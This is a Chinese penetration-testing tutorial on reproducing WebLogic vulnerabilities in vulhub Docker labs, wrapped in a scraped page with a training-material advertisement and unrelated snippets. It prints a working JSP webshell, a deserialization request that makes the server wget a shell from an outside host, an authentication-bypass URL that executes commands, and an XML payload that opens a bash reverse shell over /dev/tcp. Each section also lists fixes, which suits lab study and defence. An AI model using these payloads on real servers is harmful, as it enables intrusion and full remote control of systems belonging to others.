做图表好看的网站公司要怎么注册

张小明 2025/12/23 23:54:43
做图表好看的网站,公司要怎么注册,云匠网下载,discuz wordpress 整合WebLogic是美国Oracle公司出品的一个application server#xff0c;确切的说是一个基于JAVAEE架构的中间件#xff0c;默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的…WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。2.1后台弱口令GetShell通过弱口令进入后台界面上传部署war包getshell漏洞复现首先搭建环境命令如下cd vulhub-master/weblogic/weak_password docker-compose up -d然后访问目标的/console/login/LoginForm.jsp 目录进入一个登陆界面这里的默认账号密码是weblogic/Oracle123我们直接登录如果出现如下页面点击主页即可成功登录然后在主页中点击部署里的安装然后就可以上传文件了我们直接上传一个之前制作的war包jsp木马压缩成zip修改后缀为war上传上传完成后访问我们名为1的war包下的1.jsp文件成功访问然后用蚁剑连接漏洞修复修改密码为复杂密码2.2 CVE-2017-3506反序列化漏洞Weblogic的WLS Security组件对外提供了webserver服务其中使用了XMLDecoder来解析用户输入的XML数据在解析过程中出现反序列化漏洞可导致任意命令执行。漏洞复现搭建环境命令如下与2.1中用的环境相同cd vulhub-master/weblogic/weak_password docker-compose up -d访问以下目录中的一种如果有回显如下图则可以判断wls-wsat组件存在/wls-wsat/CoordinatorPortType/wls-wsat/RegistrationPortTypeRPC/wls-wsat/ParticipantPortType/wls-wsat/RegistrationRequesterPortType/wls-wsat/CoordinatorPortType11/wls-wsat/RegistrationPortTypeRPC11/wls-wsat/ParticipantPortType11/wls-wsat/RegistrationRequesterPortType11然后这里可以利用抓包然后添加请求包在标签之间分别写存放 jsp 的路径和要写入的 shell来获取shell也可以直接利用工具我这里利用工具在地址中填写目标url然后点击检查即可检测漏洞此处检测出有漏洞后点击文件上传将我们之前搜到的jsp一句话木马复制粘贴上去然后点击上传文件一句话木马如下%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } } public byte[] base64Decode(String str) throws Exception { try { Class clazz Class.forName(sun.misc.BASE64Decoder); return (byte[]) clazz.getMethod(decodeBuffer, String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz Class.forName(java.util.Base64); Object decoder clazz.getMethod(getDecoder).invoke(null); return (byte[]) decoder.getClass().getMethod(decode, String.class).invoke(decoder, str); } } % % String cls request.getParameter(passwd); if (cls ! null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } %显示上传完成后在工具下方会显示上传文件的路径我们直接去访问发现成功访问后用蚁剑连接漏洞修复更新到最新版本打上10271的补丁,对访问wls-wsat的资源进行访问控制2.3 CVE-2019-2725wls9-async等组件为WebLogic Server提供异步通讯服务默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷攻击者通过发送精心构造的恶意 HTTP 请求即可获得目标服务器的权限在未授权的情况下远程执行命令。漏洞复现搭建环境命令如下与前面一样cd vulhub-master/weblogic/weak_password docker-compose up -d搭建完成后访问/_async/AsyncResponseService 目录出现如下页面则访问成功存在漏洞然后开启抓包再次访问此页面将抓到的数据包改为以下内容其中第一个ip为我们所开环境的IP第二个ip是公网ip代码内容是从公网ip中下载它的一个名为2.txt的文件到我们环境的/bea_wls_internal/目录下并确认名字为12121.jsp。修改完成后放包POST /_async/AsyncResponseService HTTP/1.1 Host: ip:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,image/apng,*/*;q0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9,en;q0.8 Connection: close Content-Length: 838 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing xmlns:asyhttp://www.bea.com/async/AsyncResponseService soapenv:Header wsa:Actionxx/wsa:Action wsa:RelatesToxx/wsa:RelatesTo work:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/ void classjava.lang.ProcessBuilder array classjava.lang.String length3 void index0 string/bin/bash/string /void void index1 string-c/string /void void index2 stringwget http://ip2/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/12121.jsp /string /void /array void methodstart//void /work:WorkContext /soapenv:Headersoapenv:Body asy:onAsyncDelivery/ /soapenv:Body/soapenv:Envelope我这里2.txt的内容是jsp的一句话木马所以就相当与我们给他上传了一个一句话木马文件然后去访问/bea_wls_internal/12121.jsp,发现访问成功漏洞修复1. 禁⽤bea_wls9_async_response组件2. 删除wls9_async_response的war包并重启 3. 禁⽌访问 /_async/* 路径。2.4 CVE-2018-2628反序列化命令执⾏漏洞Weblogic Server中的RMI 通信使⽤T3协议在Weblogic Server和其它Java程序客户端或者其它 Weblogic Server实例之间传输数据, 服务器实例会跟踪连接到应⽤程序的每个Java虚拟机JVM中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端⼝的应⽤上默认开 启 攻击者可以通过T3协议发送恶意的的反序列化数据, 进⾏反序列化, 实现对存在漏洞的weblogic组件 的远程代码执⾏攻击。漏洞复现搭建环境命令如下cd vulhub-master/weblogic/CVE-2018-2628 docker-compose up -d访问环境后是404这次我们需要用到一个工具-liqun这个工具在onefox工具箱中有进入工具先选择weblogic将目标ip填入url中然后点击验证然后就可以执行命令并上传木马了上传完成后他会直接将文件路径复制到粘贴板直接去访问连接就可以漏洞修复1. 及时更新补丁 2. 禁⽤T3协议 3. 禁⽌T3端⼝对外开放或者限制可访问T3端⼝的IP来源。4. 升级版本2.5 CVE-2018-2894WebLogic⽂件任意上传漏洞Weblogic Web Service Test Page中⼀处任意⽂件上传漏洞Web Service Test Page 在 “⽣产模式” 下默认不开启所以该漏洞有⼀定限制。漏洞复现搭建环境命令如下cd vulhub-master/weblogic/CVE-2018-2894 docker-compose up -d搭建完成后在当前目录运行命令docker-compose logs | grep password 查看密码然后访问/console/login/LoginForm.jsp 目录后登录登陆后点击base_domain然后点击高级将启动web服务测试页选项勾选上然后点击保存保存后访问目标的/ws_utc/config.do目录对config.do文件进行配置将如下内容对其进行替换/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css点击提交后点击左边的安全→添加随便设置一个名字后上传一个1.jsp文件内容为一句话木马然后右键点击检查选中id这一框下面就会寻找到一个id值这是一个时间戳我们将时间戳与文件名拼接如下目录/ws_utc/css/config/keystore/1722931474218_1.jsp后访问成功访问后用蚁剑连接漏洞修复密码改为强密码2.6.CVE-2020-14882WebLogic远程代码执⾏漏洞CVE-2020-14882 允许远程⽤户绕过管理员控制台组件中的身份验证。 CVE-2020-14883 允许经过身份验证的⽤户在管理员控制台组件上执⾏任何命令。 使⽤这两个漏洞链未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执⾏任 意命令并完全控制主机漏洞复现搭建环境cd vulhub-master/weblogic/CVE-2020-14882 docker-compose up -d访问目标的/console/login/LoginForm.jsp目录进入管理控制台需要登录但是我们直接访问/console/css/%252e%252e%252fconsole.portal 就可以绕过登录认证直接进入但是此时达到未授权得效果。还未能GetShell。可以利⽤第⼆个漏洞CVE-2020-14883远程加载XML ⽂件拿到Shell先访问/console/css/%252e%252e%252fconsole.portal? _nfpbtrue_pageLabelhandlecom.tangosol.coherence.mvel2.sh.ShellSession(“java.lang.Runti me.getRuntime().exec(‘touch%20/tmp/success’);”)目录后到docker的靶机控制台中查看命令如下docker ps //查看靶机进程id docker exec -it 容器id /bin/bash //获得靶机shell ls /tmp 查看文件这里命令已经成功运⾏有个success这种利⽤⽅法只能在 Weblogic 12.2.1 及以上版本中使⽤因为 10.3.6 没有 class另一种方法这里我们创建一个恶意的xml文件将其提供到Weblogic可以访问得服务器上内容如下?xml version1.0 encodingUTF-8 ? beans xmlnshttp://www.springframework.org/schema/beans xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xsi:schemaLocationhttp://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd bean idpb classjava.lang.ProcessBuilder init-methodstart constructor-arg list valuebash/value value-c/value value![CDATA[bash -i /dev/tcp/ip/4444 01]]/value /list /constructor-arg /bean /beans然后访问以下 URLWeblogic 将加载此 XML 并执⾏其中的命令http://ip:7001/console/css/%252e%252e%252fconsole.portal? _nfpbtrue_pageLabelhandlecom.bea.core.repackaged.springframework.context.support.File SystemXmlApplicationContext(http://ip:8000/rce.xml)然后成功反弹到shell漏洞修复使weblogic访问不到外网学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

宁夏网站建设怎么样网站设计论文经济可行性分析

TF-A上电后从bl1_entrypoint执行的原因涉及硬件启动机制和软件设计的结合。让我详细解释: 1. 硬件层面的原因 ARM架构的启动流程 上电/复位 → CPU从固定地址开始执行 → 执行第一条指令对于大多数ARM处理器: 复位向量地址固定:CPU复位后&…

张小明 2025/12/20 6:09:25 网站建设

做视频招标的网站有哪些企业网站系统设计论文

本质上是客户端到认证服务器的 TCP 三层/四层连不通,或 SSL/TLS 握手/证书校验失败。先按下面 3 步定位,再按对应方案处理即可。一、定位错误1.1、ping / curl 测试三层 ping 不通 网络 / DNS / 防火墙问题 curl 能通但 4**/5** 服务活…

张小明 2025/12/20 6:07:23 网站建设

wordpress admin密码md5手机360优化大师官网

Xcode插件开发实战指南:从零构建Vim编辑器集成方案 【免费下载链接】XVim Xcode plugin for Vim keybindings 项目地址: https://gitcode.com/gh_mirrors/xv/XVim 在Xcode开发环境中实现Vim编辑体验,这听起来像是天方夜谭?XVim插件通过…

张小明 2025/12/20 6:03:21 网站建设

网站设计 psd域名查询备案

自定义小部件开发全解析 在开发自定义小部件时,有多个关键方面需要我们去关注和实现。下面我们将详细探讨这些内容,包括大小请求与分配、小部件的显示、绘制函数、公共函数的实现、小部件的测试以及接口的实现与使用。 1. 大小请求与分配 在自定义小部件时,我们需要重写父…

张小明 2025/12/20 5:59:18 网站建设

西安建网站价格建设一个公司网站要具备什么

EmotiVoice能否实现多人对话生成?多角色语音实验 在虚拟主播直播越来越频繁的今天,一场由两位AI角色共同主持的脱口秀节目正悄然上线——他们语调各异、情绪分明,时而调侃、时而争辩,仿佛真实人物在对话。这背后并非复杂的后期配音…

张小明 2025/12/20 5:57:17 网站建设